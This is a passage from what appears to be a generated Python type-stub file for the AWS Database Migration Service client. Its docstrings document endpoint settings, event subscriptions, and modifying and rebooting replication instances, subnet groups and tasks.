Shorthand syntax: ServiceAccessRoleArn=string ,BucketName=string,CompressionType=string
JSON syntax:
{ \"ServiceAccessRoleArn\": \"string\", \"BucketName\": \"string\", \"CompressionType\": \"none\"|\"gzip\" }
- **ServiceAccessRoleArn** *(string) --*
The IAM role that has permission to access the Amazon S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket to use.
:type MongoDbSettings: dict
:param MongoDbSettings:
Settings in JSON format for the source MongoDB endpoint. For more information about the available settings, see the configuration properties section in `Using MongoDB as a Target for AWS Database Migration Service <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Source.MongoDB.html>`__ in the *AWS Database Migration Service User Guide.*
- **Username** *(string) --*
The user name you use to access the MongoDB source endpoint.
- **Password** *(string) --*
The password for the user account you use to access the MongoDB source endpoint.
- **ServerName** *(string) --*
The name of the server on the MongoDB source endpoint.
- **Port** *(integer) --*
The port value for the MongoDB source endpoint.
- **DatabaseName** *(string) --*
The database name on the MongoDB source endpoint.
- **AuthType** *(string) --*
The authentication type you use to access the MongoDB source endpoint.
Valid values: NO, PASSWORD
When NO is selected, user name and password parameters are not used and can be empty.
- **AuthMechanism** *(string) --*
The authentication mechanism you use to access the MongoDB source endpoint.
Valid values: DEFAULT, MONGODB_CR, SCRAM_SHA_1
DEFAULT – For MongoDB version 2.x, use MONGODB_CR. For MongoDB version 3.x, use SCRAM_SHA_1. This attribute is not used when authType=No.
- **NestingLevel** *(string) --*
Specifies either document or table mode.
Valid values: NONE, ONE
Default value is NONE. Specify NONE to use document mode. Specify ONE to use table mode.
- **ExtractDocId** *(string) --*
Specifies the document ID. Use this attribute when ``NestingLevel`` is set to NONE.
Default value is false.
- **DocsToInvestigate** *(string) --*
Indicates the number of documents to preview to determine the document organization. Use this attribute when ``NestingLevel`` is set to ONE.
Must be a positive value greater than 0. Default value is 1000.
- **AuthSource** *(string) --*
The MongoDB database name. This attribute is not used when ``authType=NO`` .
The default is admin.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don\'t specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
:type KinesisSettings: dict
:param KinesisSettings:
Settings in JSON format for the target Amazon Kinesis Data Streams endpoint. For more information about the available settings, see `Using Object Mapping to Migrate Data to a Kinesis Data Stream <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Target.Kinesis.html#CHAP_Target.Kinesis.ObjectMapping >`__ in the *AWS Database Migration User Guide.*
- **StreamArn** *(string) --*
The Amazon Resource Name (ARN) for the Amazon Kinesis Data Streams endpoint.
- **MessageFormat** *(string) --*
The output format for the records created on the endpoint. The message format is ``JSON`` .
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) for the IAM role that DMS uses to write to the Amazon Kinesis data stream.
:type ElasticsearchSettings: dict
:param ElasticsearchSettings:
Settings in JSON format for the target Elasticsearch endpoint. For more information about the available settings, see `Extra Connection Attributes When Using Elasticsearch as a Target for AWS DMS <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Target.Elasticsearch.html#CHAP_Target.Elasticsearch.Configuration>`__ in the *AWS Database Migration User Guide.*
- **ServiceAccessRoleArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) used by service to access the IAM role.
- **EndpointUri** *(string) --* **[REQUIRED]**
The endpoint for the ElasticSearch cluster.
- **FullLoadErrorPercentage** *(integer) --*
The maximum percentage of records that can fail to be written before a full load operation stops.
- **ErrorRetryDuration** *(integer) --*
The maximum number of seconds that DMS retries failed API requests to the Elasticsearch cluster.
:type RedshiftSettings: dict
:param RedshiftSettings:
- **AcceptAnyDate** *(boolean) --*
Allows any date format, including invalid formats such as 00/00/00 00:00:00, to be loaded without generating an error. You can choose TRUE or FALSE (default).
This parameter applies only to TIMESTAMP and DATE columns. Always use ACCEPTANYDATE with the DATEFORMAT parameter. If the date format for the data does not match the DATEFORMAT specification, Amazon Redshift inserts a NULL value into that field.
- **AfterConnectScript** *(string) --*
Code to run after connecting. This should be the code, not a filename.
- **BucketFolder** *(string) --*
The location where the CSV files are stored before being uploaded to the S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket you want to use
- **ConnectionTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you initially establish a connection.
- **DatabaseName** *(string) --*
The name of the Amazon Redshift data warehouse (service) you are working with.
- **DateFormat** *(string) --*
The date format you are using. Valid values are ``auto`` (case-sensitive), your date format string enclosed in quotes, or NULL. If this is left unset (NULL), it defaults to a format of \'YYYY-MM-DD\'. Using ``auto`` recognizes most strings, even some that are not supported when you use a date format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **EmptyAsNull** *(boolean) --*
Specifies whether AWS DMS should migrate empty CHAR and VARCHAR fields as NULL. A value of TRUE sets empty CHAR and VARCHAR fields to null. The default is FALSE.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either SSE_S3 (default) or SSE_KMS. To use SSE_S3, create an IAM role with a policy that allows ``\"arn:aws:s3:::*\"`` to use the following actions: ``\"s3:PutObject\", \"s3:ListBucket\"`` .
- **FileTransferUploadStreams** *(integer) --*
Specifies the number of threads used to upload a single file. This accepts a value between 1 and 64. It defaults to 10.
- **LoadTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you begin loading.
- **MaxFileSize** *(integer) --*
Specifies the maximum size (in KB) of any CSV file used to transfer data to Amazon Redshift. This accepts a value between 1 and 1048576. It defaults to 32768 KB (32 MB).
- **Password** *(string) --*
The password for the user named in the username property.
- **Port** *(integer) --*
The port number for Amazon Redshift. The default value is 5439.
- **RemoveQuotes** *(boolean) --*
Removes surrounding quotation marks from strings in the incoming data. All characters within the quotation marks, including delimiters, are retained. Choose TRUE to remove quotation marks. The default is FALSE.
- **ReplaceInvalidChars** *(string) --*
A list of chars you want to replace. Use with ``ReplaceChars`` .
- **ReplaceChars** *(string) --*
Replaces invalid characters specified in ``ReplaceInvalidChars`` , substituting the specified value instead. The default is \"?\".
- **ServerName** *(string) --*
The name of the Amazon Redshift cluster you are using.
- **ServiceAccessRoleArn** *(string) --*
The ARN of the role that has access to the Redshift service.
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
- **TimeFormat** *(string) --*
The time format you want to use. Valid values are ``auto`` (case-sensitive), \'timeformat_string\', \'epochsecs\', or \'epochmillisecs\'. It defaults to 10. Using ``auto`` recognizes most strings, even some that are not supported when you use a time format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **TrimBlanks** *(boolean) --*
Removes the trailing white space characters from a VARCHAR string. This parameter applies only to columns with a VARCHAR data type. Choose TRUE to remove unneeded white space. The default is FALSE.
- **TruncateColumns** *(boolean) --*
Truncates data in columns to the appropriate number of characters, so that it fits in the column. Applies only to columns with a VARCHAR or CHAR data type, and rows with a size of 4 MB or less. Choose TRUE to truncate data. The default is FALSE.
- **Username** *(string) --*
An Amazon Redshift user name for a registered user.
- **WriteBufferSize** *(integer) --*
The size of the write buffer to use in rows. Valid values range from 1 to 2048. Defaults to 1024. Use this setting to tune performance.
:rtype: dict
:returns:
"""
pass
def modify_event_subscription(self, SubscriptionName: str, SnsTopicArn: str = None, SourceType: str = None, EventCategories: List = None, Enabled: bool = None) -> Dict:
"""
Modifies an existing AWS DMS event notification subscription.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/ModifyEventSubscription>`_
**Request Syntax**
::
response = client.modify_event_subscription(
SubscriptionName='string',
SnsTopicArn='string',
SourceType='string',
EventCategories=[
'string',
],
Enabled=True|False
)
**Response Syntax**
::
{
'EventSubscription': {
'CustomerAwsId': 'string',
'CustSubscriptionId': 'string',
'SnsTopicArn': 'string',
'Status': 'string',
'SubscriptionCreationTime': 'string',
'SourceType': 'string',
'SourceIdsList': [
'string',
],
'EventCategoriesList': [
'string',
],
'Enabled': True|False
}
}
**Response Structure**
- *(dict) --*
- **EventSubscription** *(dict) --*
The modified event subscription.
- **CustomerAwsId** *(string) --*
The AWS customer account associated with the AWS DMS event notification subscription.
- **CustSubscriptionId** *(string) --*
The AWS DMS event notification subscription Id.
- **SnsTopicArn** *(string) --*
The topic ARN of the AWS DMS event notification subscription.
- **Status** *(string) --*
The status of the AWS DMS event notification subscription.
Constraints:
Can be one of the following: creating | modifying | deleting | active | no-permission | topic-not-exist
The status "no-permission" indicates that AWS DMS no longer has permission to post to the SNS topic. The status "topic-not-exist" indicates that the topic was deleted after the subscription was created.
- **SubscriptionCreationTime** *(string) --*
The time the RDS event notification subscription was created.
- **SourceType** *(string) --*
The type of AWS DMS resource that generates events.
Valid values: replication-instance | replication-server | security-group | migration-task
- **SourceIdsList** *(list) --*
A list of source Ids for the event subscription.
- *(string) --*
- **EventCategoriesList** *(list) --*
A lists of event categories.
- *(string) --*
- **Enabled** *(boolean) --*
Boolean value that indicates if the event subscription is enabled.
:type SubscriptionName: string
:param SubscriptionName: **[REQUIRED]**
The name of the AWS DMS event notification subscription to be modified.
:type SnsTopicArn: string
:param SnsTopicArn:
The Amazon Resource Name (ARN) of the Amazon SNS topic created for event notification. The ARN is created by Amazon SNS when you create a topic and subscribe to it.
:type SourceType: string
:param SourceType:
The type of AWS DMS resource that generates the events you want to subscribe to.
Valid values: replication-instance | migration-task
:type EventCategories: list
:param EventCategories:
A list of event categories for a source type that you want to subscribe to. Use the ``DescribeEventCategories`` action to see a list of event categories.
- *(string) --*
:type Enabled: boolean
:param Enabled:
A Boolean value; set to **true** to activate the subscription.
:rtype: dict
:returns:
"""
pass
def modify_replication_instance(self, ReplicationInstanceArn: str, AllocatedStorage: int = None, ApplyImmediately: bool = None, ReplicationInstanceClass: str = None, VpcSecurityGroupIds: List = None, PreferredMaintenanceWindow: str = None, MultiAZ: bool = None, EngineVersion: str = None, AllowMajorVersionUpgrade: bool = None, AutoMinorVersionUpgrade: bool = None, ReplicationInstanceIdentifier: str = None) -> Dict:
"""
Modifies the replication instance to apply new settings. You can change one or more parameters by specifying these parameters and the new values in the request.
Some settings are applied during the maintenance window.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/ModifyReplicationInstance>`_
**Request Syntax**
::
response = client.modify_replication_instance(
ReplicationInstanceArn='string',
AllocatedStorage=123,
ApplyImmediately=True|False,
ReplicationInstanceClass='string',
VpcSecurityGroupIds=[
'string',
],
PreferredMaintenanceWindow='string',
MultiAZ=True|False,
EngineVersion='string',
AllowMajorVersionUpgrade=True|False,
AutoMinorVersionUpgrade=True|False,
ReplicationInstanceIdentifier='string'
)
**Response Syntax**
::
{
'ReplicationInstance': {
'ReplicationInstanceIdentifier': 'string',
'ReplicationInstanceClass': 'string',
'ReplicationInstanceStatus': 'string',
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'AvailabilityZone': 'string',
'ReplicationSubnetGroup': {
'ReplicationSubnetGroupIdentifier': 'string',
'ReplicationSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
]
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'ReplicationInstanceClass': 'string',
'AllocatedStorage': 123,
'MultiAZ': True|False,
'EngineVersion': 'string'
},
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'KmsKeyId': 'string',
'ReplicationInstanceArn': 'string',
'ReplicationInstancePublicIpAddress': 'string',
'ReplicationInstancePrivateIpAddress': 'string',
'ReplicationInstancePublicIpAddresses': [
'string',
],
'ReplicationInstancePrivateIpAddresses': [
'string',
],
'PubliclyAccessible': True|False,
'SecondaryAvailabilityZone': 'string',
'FreeUntil': datetime(2015, 1, 1),
'DnsNameServers': 'string'
}
}
**Response Structure**
- *(dict) --*
- **ReplicationInstance** *(dict) --*
The modified replication instance.
- **ReplicationInstanceIdentifier** *(string) --*
The replication instance identifier. This parameter is stored as a lowercase string.
Constraints:
* Must contain from 1 to 63 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
Example: ``myrepinstance``
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **ReplicationInstanceStatus** *(string) --*
The status of the replication instance.
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **InstanceCreateTime** *(datetime) --*
The time the replication instance was created.
- **VpcSecurityGroups** *(list) --*
The VPC security group for the instance.
- *(dict) --*
- **VpcSecurityGroupId** *(string) --*
The VPC security group Id.
- **Status** *(string) --*
The status of the VPC security group.
- **AvailabilityZone** *(string) --*
The Availability Zone for the instance.
- **ReplicationSubnetGroup** *(dict) --*
The subnet group for the replication instance.
- **ReplicationSubnetGroupIdentifier** *(string) --*
The identifier of the replication instance subnet group.
- **ReplicationSubnetGroupDescription** *(string) --*
The description of the replication subnet group.
- **VpcId** *(string) --*
The ID of the VPC.
- **SubnetGroupStatus** *(string) --*
The status of the subnet group.
- **Subnets** *(list) --*
The subnets that are in the subnet group.
- *(dict) --*
- **SubnetIdentifier** *(string) --*
The subnet identifier.
- **SubnetAvailabilityZone** *(dict) --*
The Availability Zone of the subnet.
- **Name** *(string) --*
The name of the availability zone.
- **SubnetStatus** *(string) --*
The status of the subnet.
- **PreferredMaintenanceWindow** *(string) --*
The maintenance window times for the replication instance.
- **PendingModifiedValues** *(dict) --*
The pending modification values.
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **MultiAZ** *(boolean) --*
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
- **EngineVersion** *(string) --*
The engine version number of the replication instance.
- **AutoMinorVersionUpgrade** *(boolean) --*
Boolean value indicating if minor version upgrades will be automatically applied to the instance.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **ReplicationInstancePublicIpAddress** *(string) --*
The public IP address of the replication instance.
- **ReplicationInstancePrivateIpAddress** *(string) --*
The private IP address of the replication instance.
- **ReplicationInstancePublicIpAddresses** *(list) --*
The public IP address of the replication instance.
- *(string) --*
- **ReplicationInstancePrivateIpAddresses** *(list) --*
The private IP address of the replication instance.
- *(string) --*
- **PubliclyAccessible** *(boolean) --*
Specifies the accessibility options for the replication instance. A value of ``true`` represents an instance with a public IP address. A value of ``false`` represents an instance with a private IP address. The default value is ``true`` .
- **SecondaryAvailabilityZone** *(string) --*
The availability zone of the standby replication instance in a Multi-AZ deployment.
- **FreeUntil** *(datetime) --*
The expiration date of the free replication instance that is part of the Free DMS program.
- **DnsNameServers** *(string) --*
The DNS name servers for the replication instance.
:type ReplicationInstanceArn: string
:param ReplicationInstanceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication instance.
:type AllocatedStorage: integer
:param AllocatedStorage:
The amount of storage (in gigabytes) to be allocated for the replication instance.
:type ApplyImmediately: boolean
:param ApplyImmediately:
Indicates whether the changes should be applied immediately or during the next maintenance window.
:type ReplicationInstanceClass: string
:param ReplicationInstanceClass:
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
:type VpcSecurityGroupIds: list
:param VpcSecurityGroupIds:
Specifies the VPC security group to be used with the replication instance. The VPC security group must work with the VPC containing the replication instance.
- *(string) --*
:type PreferredMaintenanceWindow: string
:param PreferredMaintenanceWindow:
The weekly time range (in UTC) during which system maintenance can occur, which might result in an outage. Changing this parameter does not result in an outage, except in the following situation, and the change is asynchronously applied as soon as possible. If moving this window to the current time, there must be at least 30 minutes between the current time and end of the window to ensure pending changes are applied.
Default: Uses existing setting
Format: ddd:hh24:mi-ddd:hh24:mi
Valid Days: Mon | Tue | Wed | Thu | Fri | Sat | Sun
Constraints: Must be at least 30 minutes
:type MultiAZ: boolean
:param MultiAZ:
Specifies if the replication instance is a Multi-AZ deployment. You cannot set the ``AvailabilityZone`` parameter if the Multi-AZ parameter is set to ``true`` .
:type EngineVersion: string
:param EngineVersion:
The engine version number of the replication instance.
:type AllowMajorVersionUpgrade: boolean
:param AllowMajorVersionUpgrade:
Indicates that major version upgrades are allowed. Changing this parameter does not result in an outage and the change is asynchronously applied as soon as possible.
Constraints: This parameter must be set to true when specifying a value for the ``EngineVersion`` parameter that is a different major version than the replication instance\'s current version.
:type AutoMinorVersionUpgrade: boolean
:param AutoMinorVersionUpgrade:
Indicates that minor version upgrades will be applied automatically to the replication instance during the maintenance window. Changing this parameter does not result in an outage except in the following case and the change is asynchronously applied as soon as possible. An outage will result if this parameter is set to ``true`` during the maintenance window, and a newer minor version is available, and AWS DMS has enabled auto patching for that engine version.
:type ReplicationInstanceIdentifier: string
:param ReplicationInstanceIdentifier:
The replication instance identifier. This parameter is stored as a lowercase string.
:rtype: dict
:returns:
"""
pass
def modify_replication_subnet_group(self, ReplicationSubnetGroupIdentifier: str, SubnetIds: List, ReplicationSubnetGroupDescription: str = None) -> Dict:
"""
Modifies the settings for the specified replication subnet group.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/ModifyReplicationSubnetGroup>`_
**Request Syntax**
::
response = client.modify_replication_subnet_group(
ReplicationSubnetGroupIdentifier='string',
ReplicationSubnetGroupDescription='string',
SubnetIds=[
'string',
]
)
**Response Syntax**
::
{
'ReplicationSubnetGroup': {
'ReplicationSubnetGroupIdentifier': 'string',
'ReplicationSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
]
}
}
**Response Structure**
- *(dict) --*
- **ReplicationSubnetGroup** *(dict) --*
The modified replication subnet group.
- **ReplicationSubnetGroupIdentifier** *(string) --*
The identifier of the replication instance subnet group.
- **ReplicationSubnetGroupDescription** *(string) --*
The description of the replication subnet group.
- **VpcId** *(string) --*
The ID of the VPC.
- **SubnetGroupStatus** *(string) --*
The status of the subnet group.
- **Subnets** *(list) --*
The subnets that are in the subnet group.
- *(dict) --*
- **SubnetIdentifier** *(string) --*
The subnet identifier.
- **SubnetAvailabilityZone** *(dict) --*
The Availability Zone of the subnet.
- **Name** *(string) --*
The name of the availability zone.
- **SubnetStatus** *(string) --*
The status of the subnet.
:type ReplicationSubnetGroupIdentifier: string
:param ReplicationSubnetGroupIdentifier: **[REQUIRED]**
The name of the replication instance subnet group.
:type ReplicationSubnetGroupDescription: string
:param ReplicationSubnetGroupDescription:
The description of the replication instance subnet group.
:type SubnetIds: list
:param SubnetIds: **[REQUIRED]**
A list of subnet IDs.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def modify_replication_task(self, ReplicationTaskArn: str, ReplicationTaskIdentifier: str = None, MigrationType: str = None, TableMappings: str = None, ReplicationTaskSettings: str = None, CdcStartTime: datetime = None, CdcStartPosition: str = None, CdcStopPosition: str = None) -> Dict:
"""
Modifies the specified replication task.
You can't modify the task endpoints. The task must be stopped before you can modify it.
For more information about AWS DMS tasks, see `Working with Migration Tasks <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Tasks.html>`__ in the *AWS Database Migration Service User Guide* .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/ModifyReplicationTask>`_
**Request Syntax**
::
response = client.modify_replication_task(
ReplicationTaskArn='string',
ReplicationTaskIdentifier='string',
MigrationType='full-load'|'cdc'|'full-load-and-cdc',
TableMappings='string',
ReplicationTaskSettings='string',
CdcStartTime=datetime(2015, 1, 1),
CdcStartPosition='string',
CdcStopPosition='string'
)
**Response Syntax**
::
{
'ReplicationTask': {
'ReplicationTaskIdentifier': 'string',
'SourceEndpointArn': 'string',
'TargetEndpointArn': 'string',
'ReplicationInstanceArn': 'string',
'MigrationType': 'full-load'|'cdc'|'full-load-and-cdc',
'TableMappings': 'string',
'ReplicationTaskSettings': 'string',
'Status': 'string',
'LastFailureMessage': 'string',
'StopReason': 'string',
'ReplicationTaskCreationDate': datetime(2015, 1, 1),
'ReplicationTaskStartDate': datetime(2015, 1, 1),
'CdcStartPosition': 'string',
'CdcStopPosition': 'string',
'RecoveryCheckpoint': 'string',
'ReplicationTaskArn': 'string',
'ReplicationTaskStats': {
'FullLoadProgressPercent': 123,
'ElapsedTimeMillis': 123,
'TablesLoaded': 123,
'TablesLoading': 123,
'TablesQueued': 123,
'TablesErrored': 123
}
}
}
**Response Structure**
- *(dict) --*
- **ReplicationTask** *(dict) --*
The replication task that was modified.
- **ReplicationTaskIdentifier** *(string) --*
The user-assigned replication task identifier or name.
Constraints:
* Must contain from 1 to 255 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
- **SourceEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **TargetEndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **ReplicationInstanceArn** *(string) --*
The Amazon Resource Name (ARN) of the replication instance.
- **MigrationType** *(string) --*
The type of migration.
- **TableMappings** *(string) --*
Table mappings specified in the task.
- **ReplicationTaskSettings** *(string) --*
The settings for the replication task.
- **Status** *(string) --*
The status of the replication task.
- **LastFailureMessage** *(string) --*
The last error (failure) message generated for the replication instance.
- **StopReason** *(string) --*
The reason the replication task was stopped.
- **ReplicationTaskCreationDate** *(datetime) --*
The date the replication task was created.
- **ReplicationTaskStartDate** *(datetime) --*
The date the replication task is scheduled to start.
- **CdcStartPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position “2018-03-08T12:12:12”
Checkpoint Example: --cdc-start-position "checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93"
LSN Example: --cdc-start-position “mysql-bin-changelog.000024:373”
- **CdcStopPosition** *(string) --*
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position “server_time:3018-02-09T12:12:12”
Commit time example: --cdc-stop-position “commit_time: 3018-02-09T12:12:12 “
- **RecoveryCheckpoint** *(string) --*
Indicates the last checkpoint that occurred during a change data capture (CDC) operation. You can provide this value to the ``CdcStartPosition`` parameter to start a CDC operation that begins at that checkpoint.
- **ReplicationTaskArn** *(string) --*
The Amazon Resource Name (ARN) of the replication task.
- **ReplicationTaskStats** *(dict) --*
The statistics for the task, including elapsed time, tables loaded, and table errors.
- **FullLoadProgressPercent** *(integer) --*
The percent complete for the full load migration task.
- **ElapsedTimeMillis** *(integer) --*
The elapsed time of the task, in milliseconds.
- **TablesLoaded** *(integer) --*
The number of tables loaded for this task.
- **TablesLoading** *(integer) --*
The number of tables currently loading for this task.
- **TablesQueued** *(integer) --*
The number of tables queued for this task.
- **TablesErrored** *(integer) --*
The number of errors that have occurred during this task.
:type ReplicationTaskArn: string
:param ReplicationTaskArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the replication task.
:type ReplicationTaskIdentifier: string
:param ReplicationTaskIdentifier:
The replication task identifier.
Constraints:
* Must contain from 1 to 255 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
:type MigrationType: string
:param MigrationType:
The migration type.
Valid values: full-load | cdc | full-load-and-cdc
:type TableMappings: string
:param TableMappings:
When using the AWS CLI or boto3, provide the path of the JSON file that contains the table mappings. Precede the path with \"file://\". When working with the DMS API, provide the JSON as the parameter value.
For example, --table-mappings file://mappingfile.json
:type ReplicationTaskSettings: string
:param ReplicationTaskSettings:
JSON file that contains settings for the task, such as target metadata settings.
:type CdcStartTime: datetime
:param CdcStartTime:
Indicates the start time for a change data capture (CDC) operation. Use either CdcStartTime or CdcStartPosition to specify when you want a CDC operation to start. Specifying both values results in an error.
Timestamp Example: --cdc-start-time “2018-03-08T12:12:12”
:type CdcStartPosition: string
:param CdcStartPosition:
Indicates when you want a change data capture (CDC) operation to start. Use either CdcStartPosition or CdcStartTime to specify when you want a CDC operation to start. Specifying both values results in an error.
The value can be in date, checkpoint, or LSN/SCN format.
Date Example: --cdc-start-position “2018-03-08T12:12:12”
Checkpoint Example: --cdc-start-position \"checkpoint:V1#27#mysql-bin-changelog.157832:1975:-1:2002:677883278264080:mysql-bin-changelog.157832:1876#0#0#*#0#93\"
LSN Example: --cdc-start-position “mysql-bin-changelog.000024:373”
:type CdcStopPosition: string
:param CdcStopPosition:
Indicates when you want a change data capture (CDC) operation to stop. The value can be either server time or commit time.
Server time example: --cdc-stop-position “server_time:3018-02-09T12:12:12”
Commit time example: --cdc-stop-position “commit_time: 3018-02-09T12:12:12 “
:rtype: dict
:returns:
"""
pass
def reboot_replication_instance(self, ReplicationInstanceArn: str, ForceFailover: bool = None) -> Dict:
"""
Reboots a replication instance. Rebooting results in a momentary outage, until the replication instance becomes available again.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/dms-2016-01-01/RebootReplicationInstance>`_
**Request Syntax**
::
response = client.reboot_replication_instance(
ReplicationInstanceArn='string',
ForceFailover=True|False
)
**Response Syntax**
::
{
'ReplicationInstance': {
'ReplicationInstanceIdentifier': 'string',
'ReplicationInstanceClass': 'string',
'ReplicationInstanceStatus': 'string',
'AllocatedStorage': 123,
'InstanceCreateTime': datetime(2015, 1, 1),
'VpcSecurityGroups': [
{
'VpcSecurityGroupId': 'string',
'Status': 'string'
},
],
'AvailabilityZone': 'string',
'ReplicationSubnetGroup': {
'ReplicationSubnetGroupIdentifier': 'string',
'ReplicationSubnetGroupDescription': 'string',
'VpcId': 'string',
'SubnetGroupStatus': 'string',
'Subnets': [
{
'SubnetIdentifier': 'string',
'SubnetAvailabilityZone': {
'Name': 'string'
},
'SubnetStatus': 'string'
},
]
},
'PreferredMaintenanceWindow': 'string',
'PendingModifiedValues': {
'ReplicationInstanceClass': 'string',
'AllocatedStorage': 123,
'MultiAZ': True|False,
'EngineVersion': 'string'
},
'MultiAZ': True|False,
'EngineVersion': 'string',
'AutoMinorVersionUpgrade': True|False,
'KmsKeyId': 'string',
'ReplicationInstanceArn': 'string',
'ReplicationInstancePublicIpAddress': 'string',
'ReplicationInstancePrivateIpAddress': 'string',
'ReplicationInstancePublicIpAddresses': [
'string',
],
'ReplicationInstancePrivateIpAddresses': [
'string',
],
'PubliclyAccessible': True|False,
'SecondaryAvailabilityZone': 'string',
'FreeUntil': datetime(2015, 1, 1),
'DnsNameServers': 'string'
}
}
**Response Structure**
- *(dict) --*
- **ReplicationInstance** *(dict) --*
The replication instance that is being rebooted.
- **ReplicationInstanceIdentifier** *(string) --*
The replication instance identifier. This parameter is stored as a lowercase string.
Constraints:
* Must contain from 1 to 63 alphanumeric characters or hyphens.
* First character must be a letter.
* Cannot end with a hyphen or contain two consecutive hyphens.
Example: ``myrepinstance``
- **ReplicationInstanceClass** *(string) --*
The compute and memory capacity of the replication instance.
Valid Values: ``dms.t2.micro | dms.t2.small | dms.t2.medium | dms.t2.large | dms.c4.large | dms.c4.xlarge | dms.c4.2xlarge | dms.c4.4xlarge``
- **ReplicationInstanceStatus** *(string) --*
The status of the replication instance.
- **AllocatedStorage** *(integer) --*
The amount of storage (in gigabytes) that is allocated for the replication instance.
- **InstanceCreateTime** *(datetime) --*
The time the replication instance was created.
- **VpcSecurityGroups** *(list) --*
The VPC security group for the instance.
- *(dict) --*
- **VpcSecurityGroupId** *(string) --*
The VPC security group Id.
- **Status** *(string) --*
The status of the VPC security group.
- **AvailabilityZone** *(string) --*
The Availability Zone for the instance.
- **ReplicationSubnetGroup** *(dict) --*
The subnet group for the replication instance.
- **ReplicationSubnetGroupIdentifier** *(string) --*
The identifier of the replication instance subnet group.
- **ReplicationSubnetGroupDescription** *(string) --*
The description of the replication subnet group.
- **VpcId** *(string) --*
The ID of the VPC.
- **SubnetGroupStatus** *(string) --*
The status of the subnet group.
- **Subnets** *(list) --*
The subnets that are in the subnet group.
- *(dict) --*
- **SubnetIdentifier** *(string) --*
The subnet identifier.
- **SubnetAvailabilityZone** *(dict) --*
